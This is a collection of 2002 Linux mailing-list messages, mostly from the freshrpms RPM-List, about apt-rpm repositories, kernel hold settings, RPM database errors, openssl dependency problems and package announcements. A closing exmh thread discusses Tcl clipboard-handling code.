&gt; kannattaa tehdÃ¤, ajatuksia?Wow, Finnish seems even more complicated than German to me :-)
Could you send an English translation next time? I really didn't understand
a thing and I assume I'm not the only one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</si>
  <si>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Peter Peltonen wrote:
&gt; Sorry about that :) 
&gt; 
&gt; Didn't think before sending... So I didn't realize that Reply-To was to 
&gt; the list and not to the sender (as it usually is). How about removing the reply-to to the list?
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>On Mon, Feb 04, 2002 at 02:33:29PM +0200, Peter Peltonen wrote:
&gt; On Fri, Feb 01, 2002 at 05:41:32PM +0200, Harri Haataja wrote:
&gt; &gt; I have a local one for the main and upgrades from somewhere plus my own
&gt; &gt; at $ORKPLACE.
&gt; 
&gt; Olen ajatellut pystyttÃ¤Ã¤ itselleni lokaalin apt-varaston, kun Suomesta ei 
&gt; tunnu lÃ¶ytyvÃ¤n julkista peiliÃ¤. Osaisitko avittaa hiukan asiassa, eli 
&gt; kuinka lÃ¤hteÃ¤ liikkeelle? Ensin kannattanee peilata varsinainen RH:n rpm:t 
&gt; jostain, vaan millÃ¤ softalla (rsync?) ja mistÃ¤ (funet?) tuo kannattaa 
&gt; tehdÃ¤, ajatuksia?I'll post my own repository story here anyway, hope no-one minds.
It may freely be commented on or used in another text.I have a directory like this:
$ tree  -d
.
|-- current7
|   |-- SRPMS.current
|   |-- SRPMS.gcc3
|   `-- redhat
|       |-- RPMS.current
|       |-- RPMS.gcc3
|       `-- base
|-- redhat-7_2
|   |-- SRPMS.os
|   `-- redhat
|       |-- RPMS.os -&gt; 
|       `-- base
`-- testing
    |-- SRPMS.testing
    `-- redhat
        |-- RPMS.testing
        `-- base27 directoriesI throw updates to current7's rpms and my own stuff (with makefile :) to
testing.
After each new package, 
nice genbasedir -s --progress --topdir=$TOPDIR/ \
testing/redhat testing(for -s to work, you need to make release files, pinch someones for
exmple)This stuff is found under apache. I put that url, my keys and all that
into apt conf on the machines on the network and apt away.As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doesn't seem like an easy option, someone should just start
a project.-- 
"Barry also was quick to point out that the Titanium uses torque screws as
opposed to Phillips screws. We're not sure why this matters even a little
bit, but Barry sure seemed to think it was interesting.
That's why Mac geeks scare us." 	-- ZDNet Powerbook Titanium review _______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>On Mon, Feb 04, 2002 at 05:04:08PM +0200, Peter Peltonen wrote:
&gt; I started wondering how does apt react when it finds a newer kernel in the 
&gt; bunch of "to be updated" files?Look at /etc/apt/apt.conf. I think ^kernel$ matches the kernel packages
(apart from those matched by the rest, smp, enterprise).
I think it won't do anything about the kernels. Come to think of it, the
abovementioned might have nothing to do with it.I explicitly use apt-get install kernel and then from the list pick a
version and then install kernel#2.4.foo-bar.&gt; And has anyone ever tried to do a dist-upgrade, say from 7.1 to 7.2? 
&gt; Should it work? If not, why?Should. Haven't tried with dist-upgrade but I have put 7.2 netboot
mirror (ie, 7.2) into sources.list and run install step-by-step for IIRC
everything. Worked ok. I think there'll be a few .rpmnew files worth
checking such as, especially, passwd and group.
I think there was a group change. "lock" ?-- 
It feels great to wake up and not know what day it is, doesn't it?_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, Peter wrote :&gt; I started wondering how does apt react when it finds a newer kernel in
&gt; the bunch of "to be updated" files?It skips it. See the /etc/apt/apt.conf file for this.&gt; And has anyone ever tried to do a dist-upgrade, say from 7.1 to 7.2? 
&gt; Should it work? If not, why?I've done a dist-upgrade from 7.2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</si>
  <si>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Mon, Feb 04, 2002 at 04:53:14PM +0100, Matthias Saou wrote:
&gt; It skips it. See the /etc/apt/apt.conf file for this.In my apt.conf reads:----
RPM
{
   // Leave list empty to disable
   AllowedDupPkgs {"^kernel$"; "kernel-smp"; "kernel-enterprise"; };
   HoldPkgs {"kernel-source"; "kernel-headers"; };
}
----If I understand this correctly, then only kernel-source and kernel-headers 
are held from being installed, but kernel will be installed, right?Maybe I should test this on some vanilla system...-- 
Peter
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Hiya, I just myself an rpm, and when I did -Uvh to upgrade the earlier 
version I had installed (also from my rpm) I got:[root@spawn i386]# rpm -Uvh mulberry-2.2-b1.i386.rpm
Preparing...                ########################################### 
[100%]
   1:mulberry               ########################################### 
[100%]
error: db3 error(-30998) from db-&gt;close: DB_INCOMPLETE: Cache flush was 
unable to completeWhats the DB_INCOMPLETE mean?It all seems to have installed ok thou...                                    -- \m/ --
  "...if I seem super human I have been misunderstood." (c) Dream Theater
         mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Mark Derricutt wrote:
&gt; Hiya, I just myself an rpm, and when I did -Uvh to upgrade the earlier 
&gt; version I had installed (also from my rpm) I got:
&gt; 
&gt; [root@spawn i386]# rpm -Uvh mulberry-2.2-b1.i386.rpm
&gt; Preparing...                ########################################### 
&gt; [100%]
&gt;   1:mulberry               ########################################### 
&gt; [100%]
&gt; error: db3 error(-30998) from db-&gt;close: DB_INCOMPLETE: Cache flush was 
&gt; unable to completeIt's not the rpm, it's the rpm-system with you. The cache seems to have 
rottened. Try removing /var/lib/rpm/__db*
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Do I need to do anything to recreate anything after deleting this?I did notice an rpm I made the other day didn't work, and just sat there 
for ages  seemingly doing nothing, which probably did this :(Ok, now I get:
Fetched 88.1kB in 2m31s (581B/s)
error: cannot get exclusive lock on /var/lib/rpm/Packages
error: cannot open Packages index using db3 - Operation not permitted (1)
E: could not open RPM database:cannot open Packages index using db3 - 
Operation not permitted (1)Arrrrg.--On Tuesday, February 05, 2002 15:06:28 +0100 Roy-Magne Mo 
 wrote:&gt; It's not the rpm, it's the rpm-system with you. The cache seems to have
&gt; rottened. Try removing /var/lib/rpm/__db*                                    -- \m/ --
  "...if I seem super human I have been misunderstood." (c) Dream Theater
         mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Never mind, there was some cron thing doing rpm -qf ???  seems fine now.--On Wednesday, February 06, 2002 07:37:44 +1300 Mark Derricutt 
 wrote:&gt; Fetched 88.1kB in 2m31s (581B/s)
&gt; error: cannot get exclusive lock on /var/lib/rpm/Packages
&gt; error: cannot open Packages index using db3 - Operation not permitted (1)
&gt; E: could not open RPM database:cannot open Packages index using db3 -
&gt; Operation not permitted (1)                                    -- \m/ --
  "...if I seem super human I have been misunderstood." (c) Dream Theater
         mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Mark Derricutt wrote:
&gt; Never mind, there was some cron thing doing rpm -qf ???  seems fine now.
&gt; 
&gt; --On Wednesday, February 06, 2002 07:37:44 +1300 Mark Derricutt 
&gt;  wrote:
&gt; 
&gt;&gt; Fetched 88.1kB in 2m31s (581B/s)
&gt;&gt; error: cannot get exclusive lock on /var/lib/rpm/Packages
&gt;&gt; error: cannot open Packages index using db3 - Operation not permitted (1)
&gt;&gt; E: could not open RPM database:cannot open Packages index using db3 -
&gt;&gt; Operation not permitted (1)You can do a rpm --rebuilddb too
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Two issues:----
Sorry, but the following packages have unmet dependencies:
  openssh: Depends: openssl (= 0.9.5a) but 0.9.6b-8 is installed
  php-pgsql: Depends: postgresql but it is not installed
             Depends: libpq.so.2
E: Unmet dependencies. Try using -f.
----1. I have the following openssl packages installed:----
openssl-perl-0.9.6b-8
openssl-0.9.6b-8
openssl095a-0.9.5a-11
openssl-devel-0.9.6b-8
----The openssl095a package should provide the openssl-0.9.5a compatibility 
but apt doesn't think so? 2. I have postgresql installed from the source. So that's why I need 
php-pgsql. Is there a way to tell apt about packages I don't want it to 
complain about?-- 
Peter
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, Harri wrote :&gt; On Wed, Feb 06, 2002 at 04:29:53PM +0200, Peter Peltonen wrote:
&gt; &gt; Two issues:
&gt; &gt; 
&gt; &gt; ----
&gt; &gt; Sorry, but the following packages have unmet dependencies:
&gt; &gt;   openssh: Depends: openssl (= 0.9.5a) but 0.9.6b-8 is installed
&gt; &gt;   php-pgsql: Depends: postgresql but it is not installed
&gt; &gt;              Depends: libpq.so.2
&gt; &gt; E: Unmet dependencies. Try using -f.
&gt; &gt; ----
&gt; &gt; 
&gt; &gt; 1. I have the following openssl packages installed:
&gt; &gt; 
&gt; &gt; ----
&gt; &gt; openssl-perl-0.9.6b-8
&gt; &gt; openssl-0.9.6b-8
&gt; &gt; openssl095a-0.9.5a-11
&gt; &gt; openssl-devel-0.9.6b-8
&gt; &gt; ----
&gt; &gt; 
&gt; &gt; The openssl095a package should provide the openssl-0.9.5a compatibility
&gt; &gt; but apt doesn't think so? 
&gt; 
&gt; I believe that's just a matter of string parsing. If someone were to fix
&gt; the openssh package, removing the explicit Requires:, I believe the
&gt; automagic binary handler would figure the right libraries to use and
&gt; install. I haven't met an openssh like that and in worst case I've had 3
&gt; different openssl libraries (WTF can't they just bump a major version if
&gt; it's incompatible?!?).Strange... all my openssh packages don't explicitly requires a version of
openssl. What version of openssh do you have? Is it an official Red Hat
package? I suppose it isn't, and using Red Hat's rpms will solve your
problem.What you need to know for openssl is :
0.9.5b is libcrypto.so.0 and libssl.so.0
0.9.6  is libcrypto.so.1 and libssl.so.1
0.9.6b is libcrypto.so.2 and libssl.so.2Now in all Red Hat packages I've seen so far, the only dependency is on
those files and not on "openssl = version".Matthias--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</si>
  <si>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Wed, Feb 06, 2002 at 04:30:18PM +0200, Harri Haataja wrote:
&gt; install. I haven't met an openssh like that and in worst case I've had 3
&gt; different openssl libraries (WTF can't they just bump a major version if
&gt; it's incompatible?!?).So, what should I with the openssl thing?&gt; something) and Ive just made dummy packages (with verbose warning
&gt; attached ;) that explicitly provide those capabilities. (or claim to,
&gt; that is).How do I make such packages?-- 
Peter
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>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problem.openssh-3.0.2p1-1I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Peter
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, Peter wrote :&gt; On Wed, Feb 06, 2002 at 04:14:27PM +0100, Matthias Saou wrote:
&gt; &gt; Strange... all my openssh packages don't explicitly requires a version
&gt; &gt; of openssl. What version of openssh do you have? Is it an official Red
&gt; &gt; Hat package? I suppose it isn't, and using Red Hat's rpms will solve
&gt; &gt; your problem.
&gt; 
&gt; openssh-3.0.2p1-1
&gt; 
&gt; I think that is directly from openssh site. It's from the RH 6.2 that I 
&gt; upgraded to 7.2 (6.2 doesn't ship with openssh...). That explains...&gt; I probably should downgrade to the versoin RH provides except I can't do 
&gt; that as I don't have physical access to that box and downgrading ssh 
&gt; packages over ssh doesn't sound like a bright idea...Well, with 7.0, I've seen a few problems with doing that, but as of 7.2
it's really wonderful! Ever tried of completely uninstalling all openssh
related packages while being connected through ssh? Well, it works!!!! Of
course, if the connection cuts at that moment, you're stuck, but a simple
upgrade with official Red Hat packages also works like a charm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</si>
  <si>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Wed, Feb 06, 2002 at 04:30:18PM +0200, Harri Haataja wrote:
&gt; I have a few such things (with jdk, imlib, kernel DRI version..
&gt; something) and Ive just made dummy packages (with verbose warning
&gt; attached ;) that explicitly provide those capabilities. (or claim to,
&gt; that is).Hm. One could do this with rpm's --justdb switch too, without having to 
make a dummy package, right?I was wondering that this is a bit dangerous if there is a update for my 
software, as the dummy package might get updated with it overwriting the 
installation I've done from source... Not good.Is there really no "--nodeps" kind of switch in apt-get? -- 
Peter
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>About apt.conf there are these lines:----
RPM 
{
   // Leave list empty to disable
   AllowedDupPkgs {"^kernel$"; "kernel-smp"; "kernel-enterprise"; };
   HoldPkgs {"kernel-source"; "kernel-headers"; };
}
----How do I tell apt hold all kernel packages? Can I use syntax like 
"kernel*"; ? And I don't quite understand what the part "^kernel$"; means?-- 
Peter
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>On Thu, Feb 07, 2002 at 12:29:14AM +0200, Peter Peltonen wrote:
&gt; About apt.conf there are these lines:
&gt; ----
&gt; RPM 
&gt; {
&gt;    // Leave list empty to disable
&gt;    AllowedDupPkgs {"^kernel$"; "kernel-smp"; "kernel-enterprise"; };
&gt;    HoldPkgs {"kernel-source"; "kernel-headers"; };
&gt; }
&gt; ----
&gt; 
&gt; How do I tell apt hold all kernel packages? Can I use syntax like 
&gt; "kernel*"; ? 
&gt; 
&gt; And I don't quite understand what the part "^kernel$"; means?You could read about regular expressions.
^kernel$ matches "kernel" and nothimg more.
Kerne, kernel-smp and kernel-enterprise are the kernel packages you
might be running in a RH system. Packages like kernel-headers,
kernel-BOOT and kernel-doc aren't matched. If it just said "kernel", it
would match *all* those packages.-- 
"You were good with that recorder." (=nokkahuilu)
"Soitit hyvin sitÃ¤ mankkaa."
	-- (Suomennos) Men Behaving Badly_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t xml:space="preserve">
Thanks for the great work Mathias but I would like to point out that this
list is fastly become the apt-rpm-list instead of the rpm-list. The
discussion concerning apt is overwhelming. Maybe another list is in order
for those having trouble with apt-rpm. apt-rpm-hotline@freshrpms.net ? :)Though I think apt-rpm is a great tool, I don't use it and would like to
get back to talk of new packages and rpm building techniques.dTd
Daniel T. Drea
dandanielle@mindspring.com
http://dandanielle.home.mindspring.com
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, dTd wrote :&gt; 
&gt; Thanks for the great work Mathias but I would like to point out that this
&gt; list is fastly become the apt-rpm-list instead of the rpm-list. The
&gt; discussion concerning apt is overwhelming. Maybe another list is in order
&gt; for those having trouble with apt-rpm. apt-rpm-hotline@freshrpms.net ? :)
&gt; 
&gt; Though I think apt-rpm is a great tool, I don't use it and would like to
&gt; get back to talk of new packages and rpm building techniques.Hmmm, know what? On http://lists.freshrpms.net/ the apt-list has been up
for a while now ;-) There is almost no traffic though, since I wanted to
keep that list for apt-rpm on the server side (mirrors, building
repositories etc.), but hey, it could be a good place for general apt-rpm
questions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</si>
  <si>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 xml:space="preserve">Hi all,I'll be leaving this evening until next Monday, with no access to
whatsoever to a single computer until then, woohoo, real holidays! :-)So don't be worried if there's a new release of  and that it's not updated quickly despite your many
requests to the list ;-)Before going, I did repackage the latest hackedbox and lbreakout2 that both
came out today.Have fun! (I will!! ;-))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</si>
  <si>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Tue, 2002-09-10 at 12:39, Matthias Saou wrote:
&gt; Hi all,
&gt; 
&gt; I'll be leaving this evening until next Monday, with no access to
&gt; whatsoever to a single computer until then, woohoo, real holidays! :-)I don't think I could take it. The network was down for an hour here and
I was climbing the walls. :)Enjoy!-- 
Chris Kloiber_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 10 Sep 2002 18:39:07 +0200
Matthias Saou  wrote:&gt; Before going, I did repackage the latest hackedbox and lbreakout2 that
&gt; both came out today.
&gt; 
&gt; Have fun! (I will!! ;-))
fun here too, recompiled gnome 2.02rc2 today ;-)Have a nice and good time!-- 
regards
      Matthias_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Chris wrote :&gt; On Tue, 2002-09-10 at 12:39, Matthias Saou wrote:
&gt; &gt; Hi all,
&gt; &gt; 
&gt; &gt; I'll be leaving this evening until next Monday, with no access to
&gt; &gt; whatsoever to a single computer until then, woohoo, real holidays! :-)
&gt; 
&gt; I don't think I could take it. The network was down for an hour here and
&gt; I was climbing the walls. :)I can't stand it either when it's at work or home and I'd planned on doing
something that required network access... but I really feel like I need a
break now, away from work pressure that almost drove me nuts all summer!
Ah, the joys of responsibilities... :-/Six days without computers ahead, but six days driving my 600 Bandit
roadster bike! I won't be miserable nor get bored, don't worry for me ;-)
I also have the first Lord of the Rings book to finish (half way through
now) and the two others to read... lots of "sane" and non-wired occupations
ahead!
Oh, did I mention beer drinking with friends? :-))))Matthias (really happy to be on holidayyyy for the first time this year!)--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</si>
  <si>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http://beast.gtk.orgThere's a realy nasty shortage on sequencers :((Actually I'd like this running on my main box, which is Irix but that
I'll probably try to tackle myself :)-- 
Rule #1: All software sucks
Rule #2: All hardware sucks.
Rule #3: My vacuum-cleaner is hardware. It never obeys rule #2?
		-- Tanuki the Raccoon-dog, Scary Devil Monastery
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,Just the kind of announce I make once in a while :
- I've rebuilt a new "alsaplayer" package based on Angle's one.
- I've rebuilt a hopefully final version "-fr8" of the "alsa-driver" and
  "alsa-kernel" packages which fix all known SMP build issues.Both can be found here :
http://ftp.freshrpms.net/pub/freshrpms/testing/alsa/I've also repackaged gkrellm 2.0.2 with at last a separate package for the
server that can be installed standalone and doesn't even require glib2.
http://ftp.freshrpms.net/pub/freshrpms/testing/gkrellm/Last but not least, my latest proftpd 1.2.6 package incorporates some nifty
new features : You can use any of "--with ldap", "--with mysql" and "--with
postgres" when rebuilding the source rpm with rpmbuild to enable desired
extra authentication methods and all package requirements are set
accordingly, and the release tag is changed too.
http://valhalla.freshrpms.net/ (the usual place ;-))I think I'll use this "--with " switch more and more where
possible. Some other of my package already use it like the xmame for its
output targets, sqlrelay for its modules and my latest sylpheed claws spec
to enable Pilot support.As usual, feedback and comments are welcome! :-)MatthiasPS: Yup, I'm back from my holidays ;-)-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
Load : 2.42 2.10 1.32, AC on-line, battery charging: 100% (7:12)_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2002-09-18 at 17:50, Matthias Saou wrote:&gt; I think I'll use this "--with " switch more and more where
&gt; possible.Nifty, I've been thinking about that too.  Any good ideas how to
document those targets?  %description?-- 
\/ille SkyttÃ¤
ville.skytta at iki.fi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings ...&gt; PS: Yup, I'm back from my holidays ;-)
	I hope you did not miss us at all ... ;-0 &gt; I think I'll use this "--with " switch more and more where
 &gt; possible.
	Mmm, great stuff ... Now to get the RedHat Samba packager to do the same 
thing ...	I have used there spec file and fun a few problems in it, and one of them 
was just hashing out things for other use ...	Now to get to grips with the Kernel ... still have not found and easy way to 
rebuild the Kernel without having to wait and hour for it to generate the 
headers for all arch ... arrrrhhhh ...Mailed
Lee
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, C.Lee wrote :&gt;  &gt; I think I'll use this "--with " switch more and more where
&gt;  &gt; possible.
&gt; 	Mmm, great stuff ... Now to get the RedHat Samba packager to do the
&gt; 	same thing ...I'm sure that if you file a bugzilla entry with a relevant patch against
the spec file, chances of getting the change done are on your side ;-)&gt; 	I have used there spec file and fun a few problems in it, and one
&gt; 	of them was just hashing out things for other use ...
&gt; 
&gt; 	Now to get to grips with the Kernel ... still have not found and
&gt; 	easy way to rebuild the Kernel without having to wait and hour for
&gt;       it to generate the headers for all arch ... arrrrhhhh ...The problem is that "--with  --without " is clearly not meant to
change deeply the way a package is built. Its use would be more like
enabling/disabling gpg, ldap, whateversql support in packages as it's not
possible to use something like "--with-=" which could be used for
a much wider scope.Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
Load : 0.00 0.12 0.32, AC on-line, battery charging: 100% (4:47)_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Saou (matthias@rpmforge.net) wrote*:
&gt;- I've rebuilt a new "alsaplayer" package based on Angle's one.Cool, one less package to maintain :)One interesting thing about alsaplayer is that RedHat's XMMS package in RH8 will
probably not play mp3 files. But alsaplayer does play mp3s "out of the box".Also, they are developing rapidly in their CVS and looks like their next version
of alsaplaer will be pretty cool, but I have no idea when it will be ready.--
That's "angle" as in geometry._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Have you thought of bumping up sylpheed-claws?  I see sylpheed got a
bump... show some claws love?  (;-- 
Jesse Keating
j2Solutions.net
Mondo DevTeam (www.mondorescue.org)Was I helpful?  Let others know:
 http://svcs.affero.net/rm.php?r=jkeating_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Angles Puglisi (angles@aminvestments.com) wrote*:
&gt;Also, they are developing rapidly in their CVS and looks like their next version
&gt;of alsaplaer will be pretty cool, but I have no idea when it will be ready.ahh, oops they just released. -/--
That's "angle" as in geometry._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Jesse wrote :&gt; Have you thought of bumping up sylpheed-claws?  I see sylpheed got a
&gt; bump... show some claws love?  (;Well, in sylheed's "claws" branch you need to wait a bit for the developers
to backport all the updates from the main branch before getting a release
with the same version number.Right now, the latest "claws" release is still 0.8.2claws :
http://sourceforge.net/project/showfiles.php?group_id=25528But as it's the primary mailer I use, you can be sure that as soon as it's
updated to 0.8.3, I'll update my build! :-)Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
Load : 0.18 0.23 0.33, AC on-line, battery charging: 100% (4:47)_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,has anyone an answer for me? The mplayer documentation still suggests to use
them for x86 architectures.Thanks. :)Regards, Axel.On Sat, Jun 08, 2002 at 11:39:03PM +0200, Axel Thimm wrote:
&gt; Are there perhaps licensing issues, which forbid such a practice? Or any other
&gt; reasons?
&gt; 
&gt; The reason I ask is that I have seen performance and also some feature
&gt; differences (fullscreen w/o keeping aspect ratio, visual artifacts on NVIDIA)
&gt; comparing with or without the Win32 codecs. The mplayer authors seem to
&gt; recommend using them for x86 architectures.
&gt; 
&gt; Beware, I am no mplayer/codecs/whatever expert, I may be totally lost ...-- 
Axel.Thimm@physik.fu-berlin.de_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Axel wrote :&gt; has anyone an answer for me? The mplayer documentation still suggests to
&gt; use them for x86 architectures.Well, I think my avifile build still needs the win32 codecs to be able to
run (manually copied into /usr/lib/win32/), but personally, I've been very
happy with mplayer's default (which is ffmpeg's ffdivx decoder) for nearly
all the DivX files I used. The only ones that still require (from my own
experience) the use of the win32 codecs are the ones encoded with a strange
DivX 3 sound format... and I've really not seen any quality or speed
improvements when using them.Matthias&gt; On Sat, Jun 08, 2002 at 11:39:03PM +0200, Axel Thimm wrote:
&gt; &gt; Are there perhaps licensing issues, which forbid such a practice? Or
&gt; &gt; any other reasons?
&gt; &gt; 
&gt; &gt; The reason I ask is that I have seen performance and also some feature
&gt; &gt; differences (fullscreen w/o keeping aspect ratio, visual artifacts on
&gt; &gt; NVIDIA) comparing with or without the Win32 codecs. The mplayer authors
&gt; &gt; seem to recommend using them for x86 architectures.
&gt; &gt; 
&gt; &gt; Beware, I am no mplayer/codecs/whatever expert, I may be totally lost
&gt; &gt; ...-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
Load : 0.35 0.46 0.43, AC on-line, battery charging: 100% (4:47)_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">
BTW: I just a found a quite nice looking apt repositry for all kinds of
audio apps athttp://ccrma-www.stanford.edu/planetccrma/software/Peter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&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 20 Sep 2002 10:40:55 +0200
Matthias Saou  wrote:# But as it's the primary mailer I use, you can be sure that as soon
# as it's updated to 0.8.3, I'll update my build! :-)It got updated (;-- 
Jesse Keating
j2Solutions.net
Mondo DevTeam (www.mondorescue.org)Was I helpful?  Let others know:
 http://svcs.affero.net/rm.php?r=jkeating_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">I need to experiment with ripping out all my "sophisticated" cut/paste
code.  This is mostly historical accident from dealing with very early
versions of Tk, and the emacs "cutbuffer", and other wierd junk.
You can, too, by hacking upon seditBind.tcl appropriately.&gt;&gt;&gt;Hal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</si>
  <si>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It's all here in these 10 lines, otherwise known as the
"I'll try my damnest to paste something" procedure:# Return the current selection (from any window) or cut buffer 0.
proc Text_Selection {} {
    if [catch {selection get} sel] {
        if [catch {selection get -selection CLIPBOARD} sel] {
            if [catch {cutbuffer get 0} sel] {
                return ""
            }
        }
    }
    return $sel
}This is in textSelection.tcl, and is what exmh uses to find text to paste.
It is that last "cutbuffer get" that is wacky, because exmh sticks its
own deletions into that little know stash, and is probably the only
application on the planet that still looks there.  We should probably
just disable that - try this variant:proc Text_Selection {} {
    if [catch {selection get} sel] {
        if [catch {selection get -selection CLIPBOARD} sel] {
            return ""
        }
    }
    return $sel
}Everything funnels through here, so you just need to hack this one spot.
&gt;&gt;&gt;Rick Baartman said:
 &gt; I've never understood the mouse buffer operation with exmh either. Here's th
     e 
 &gt; behaviour I have. I have exmh and XEmacs windows up, and a terminal window. 
     (I 
 &gt; also have gnome1.4 running and enlightenment as wm.) I select text in the ex
     mh 
 &gt; window and while it is highlighted, I can paste into anything else. If I sel
     ect 
 &gt; it and then click so the highlighting is off, then what I paste is not the 
 &gt; recently-selected text in exmh, but an old selection. If I select in XEmacs 
     and 
 &gt; leave it highlighted, I can paste it into exmh sedit window; but if it is no
 &gt; longer highlighted, what I paste is an old selection. I can live with this 
 &gt; behaviour except for one additional thing. If nothing is highlighted, then w
     hat 
 &gt; I paste into exmh is different from what I paste into other windows. To be m
     ore 
 &gt; specific, here's what gets pasted if nothing is highlighted:
 &gt; 
 &gt; Application       What gets pasted
 &gt; 
 &gt; XEmacs            whatever was last selected unless it was last selected in 
     exmh
 &gt; xterm             same as XEmacs
 &gt; AbiWord           nothing
 &gt; Nedit             nothing
 &gt; sedit             Whatever was last highlighted in sedit and overwritten
 &gt; 
 &gt; The last needs some amplification. If I highlight something in sedit, then 
 &gt; obviously that's what gets pasted. If the highlighting is off, then what get
     s 
 &gt; pasted is NOT what was last highlighted in sedit, but what was last highligh
     ted 
 &gt; and typed over (I have "Type Kills SEL" on.).
 &gt; 
 &gt; It seems that exmh and sedit are the oddballs here. Very often when I try to
 &gt; paste something in sedit I end up muttering WTF??
 &gt; 
 &gt; --
 &gt; rick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</si>
  <si>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&gt;&gt;&gt;Hal DeVore said:
 &gt;     "Brent said in his book"
 &gt;     This Paste function can be convenient, but it turns out that
 &gt;     users still need to keep track of the difference between the
 &gt;     two selections.  If a user only understands the CLIPBOARD,
 &gt;     then the user of PRIMARY is only surprising.  I learned that
 &gt;     it is best to have a separate paste user action for the two
 &gt;     selections.  The convention is that  sets
 &gt;     the insert point and inserts the PRIMARY selection. ... The
 &gt;     &lt;&gt; event (e.g., the Paste key) simply inserts the
 &gt;     CLIPBOARD selection at the current insert point. ...Yeah, I learned by hearing exmh users scream in agony.  Sorry about
all that.  We should be able to clean this up.  If you grep for
"bind" in seditBind you quickly find the Text_Selection proc
I described in the previous email.--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</si>
  <si>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
&gt;&gt;&gt;"Kevin Oberman" said:
 &gt; It did for me, but I am not willing to say it is not a tcl/tk issue as
 &gt; other apps seemed to work OK for cut and paste and Tk does its
 &gt; clipboard stuff a bit differently than most toolkits. So I'm not
 &gt; about to place blame. Just reporting my experience.One more salvo on X and cut/paste.  X specifies at least two *mechanisms*
for cut/paste, but as usual mandates no *policy*.  Windows and Macintosh
have a slightly different mechanism and one uniform policy.  I'm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great.I would encourage folks to play with those 10 lines of code in
Text_Selection and report what works well for them.  We may come up
